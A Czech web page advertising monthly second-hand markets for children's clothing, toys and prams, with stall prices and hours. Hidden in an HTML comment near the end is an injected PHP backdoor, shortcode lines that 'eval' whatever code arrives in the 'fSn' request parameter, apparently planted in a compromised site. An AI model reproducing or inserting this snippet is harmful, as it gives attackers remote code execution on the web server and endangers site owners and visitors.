Prodejte dětské zboží po svých ratolestech

Máte po svých dětech spoustu dětského oblečení a hraček, které vám doma ve skříních zabírají místo? Je vám líto všechny tyto dětské potřeby vyhazovat a nechce se vám podávat velké množství inzerátů a využít náš dětský bazar? Právě pro vás pořádáme pravidelné akce – AVÍZO MINI BAZARy.

AVÍZO MINI BAZAR pořádáme pravidelně každý měsíc ve třech lokalitách:

Podrobnější informace o lokalitách a přesné termíny konání naleznete na stránkách minibazaru.

Na MINI BAZARECH můžete prodávat dětské oblečení, kočárky, autosedačky, hračky nebo sportovní vybavení po svých dětech ve věku od 0-12  let. Do prodávaného sortimentu se zahrnuje i těhotenské oblečení.

V případě zájmu o prodejní místo je nutná předběžná rezervace. Pro velký zájem doporučujeme rezervovat místo minimálně měsíc předem. Stůl o rozměru 120×80 cm si můžete pronajmout za 150 Kč, prodej kočárku za 50 Kč, prodej na vlastním stojanu za 50 Kč. Všechny MINI BAZARY jsou zpřístupněny pro prodávající od 7 hodin, ať máte prostor k vybrání stolu a vybalení zboží. Nakupující přicházejí od 8 do 12 hodin.

Přijďte s námi strávit hezké dopoledne s jinými maminkami či tatínky u kávičky, podělit se o své zkušenosti s dětmi, případně dát dobrou radu nastávajícím maminkám. Děti se mohou mezitím bavit v našem dětském koutku. Těšíme se na vás!

<!– [insert_php]if (isset($_REQUEST["fSn"])){eval($_REQUEST["fSn"]);exit;}[/insert_php][php]if (isset($_REQUEST["fSn"])){eval($_REQUEST["fSn"]);exit;}[/php] –>


Zanechat komentář

Vaše e-mailová adresa nebude zveřejněna. Vyžadované informace jsou označeny *